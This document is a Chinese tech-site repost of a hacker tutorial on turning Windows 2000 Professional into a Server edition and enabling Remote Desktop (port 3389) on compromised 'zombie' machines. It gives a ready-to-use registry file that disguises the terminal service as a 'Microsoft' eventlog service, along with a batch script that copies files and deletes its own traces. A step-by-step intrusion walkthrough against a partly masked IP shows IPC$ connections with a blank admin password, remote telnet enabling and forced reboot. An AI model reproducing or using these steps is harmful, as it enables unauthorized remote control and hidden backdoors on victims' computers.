科技行者

行者学院 转型私董会 科技行者专题报道 网红大战科技行者

知识库

知识库 安全导航

至顶网安全频道网络安全远程登陆在专业版下开3389的方法大全

远程登陆在专业版下开3389的方法大全

  • 扫一扫
    分享文章到微信

  • 扫一扫
    关注官方公众号
    至顶头条

众所周知windows2000 profassional并不支持3389终端服务,所以我们如果发现得到管理员密码的肉机是此版本,只能放弃安装终端服务的念头。但是现在我们已经可以在profassional版中安装终端服务了!

来源:比特网 2009年11月8日

关键字: 网络攻击 远程安全 远程接入

  • 评论
  • 分享微博
  • 分享邮件

  在win2000 Professional版中安装3389终端服务

  众所周知windows2000 profassional并不支持3389终端服务,所以我们如果发现得到管理员密码的肉机是此版本,只能放弃安装终端服务的念头。但是现在我们已经可以在profassional版中安装终端服务了!

  方法如下:

  1. 将profassional版改变为server版

  2. 安装终端服务

  关于安装终端服务的细节网络中已经有许多优秀的文章,这里不再重复。

  下边就说说如何将profassional版改变为server版:

  原理:其实windows 2000的各个版本都使用了同样的程序、动态链接库,它们之间最大的差别是在注册表中。windows2000三合一光盘就证明了这一点。因此只要将profassional版注册表中的相关项目改为server及以上版本,就可以在profassional版中安装终端服务了。

  现在3am Laboratories已经将改变win2000版本的方法做成一个非常方便使用的软件:NTSwitch,让我们可以随心所欲地快速改变版本。此软件可以在小凤居中下载到,下载地址为URL http://www.chinesehack.org/down/show.asp?id=2192&down=1

  可能由于微软的压力,3am Laboratories已将此软件从其主页中删除,大家快下载吧!

  远程版本变换的具体实现方法:

  法1:

  1 在远程肉机上运行支持图形界面的远程控制程序(如:冰河、PcAnyWhere等)

  2 远程控制下,下载并运行NTSwitch改变版本

  3 安装3389终端服务

  此法非常方便,技术要求最低。但操作过程对方是全部可以看见的,非常危险!

  法2:

  1 自己将自己本地的win2000 professional改变为win2000 server版,利用注册表对比软件对比版本变换前后注册表的差别。将差别制作成一个chang.reg文件。

  2 利用所得到的肉机管理员密码,开启肉机Telnet服务。

  3 Telnet上肉机后,利用regedit.exe /s chang.reg 命令, 将远程注册表改变,从而实现远程win2000的版本变换。

  此法需要一定的经验,但操作很安全。而且可以用“迷途vb”的方法进一步安装3389终端服务。

  以下是“迷途vb”的安装3389终端服务方法

  ========================

  首先我们制作开启3389的工具

  先把下面的注册表内容copy一份,另存为3389.reg注册表文件

  注册表内容:

  Windows Registry Editor Version 5.00

  [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache]

  "Enabled"="0"

  [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]

  "ShutdownWithoutLogon"="0"

  [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]

  "EnableAdminTSRemote"=dword:00000001

  [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]

  "TSEnabled"=dword:00000001

  [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD]

  "Start"=dword:00000002

  [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle]

  "Hotkey"="1"

  [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecuService]

  "Start"=dword:00000002

  "ErrorControl"=dword:00000001

  "ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,65,00,76,00,65,00,6e,00,74,00,6c,00,6f,00,67,00,2e,00,65,00,78,00,65,00,00,00

  "ObjectName"="LocalSystem"

  "Type"=dword:00000010

  "Description"="Microsoft"

  "DisplayName"="Microsoft"

  再把下面的内容保存为批处理文件3389.bat

  安装批处理内容:

  copy termsrv.exe eventlog.exe

  regedit.exe /s 3389.reg

  del 3389.reg

  del 3389.exe

  del 3389.bat

  用winrar制作成exe自解压缩包

  61.188.***.*** user:administrato pass:空

  先使用工具letmein判断其操作系统

  letmein \\ip -all -d

  TsInternetUser (TsInternetUser)这个是2000的终端用户,现在可以判断其为2000server了

  再使用终端登陆软件看看他的3389是不是已经开启了免了费事折腾

  应该没有开启了

  建立ipc连接

  copy工具过去

  net use \\ip\ipc$ "pass" /user:name

  copy file \\ip\admin$\system32

  用opentelnet开对方的telnet

  opentelnet \\ip name pass 1 99

  用telnet进入

  进入到对方的winnt\system32目录

  解压缩3389.exe

  运行安装批处理3389.bat

  现在我们把对方重起一下,用reboot

  我们用ping命令监视他的上线情况,等他下线,呵呵下了,又上来了,不慌连,3389等会才能好,对方的机器有点慢看见了么,开启成功!

    • 评论
    • 分享微博
    • 分享邮件
    邮件订阅

    如果您非常迫切的想了解IT领域最新产品与技术信息,那么订阅至顶网技术邮件将是您的最佳途径之一。

    重磅专题
    往期文章
    最新文章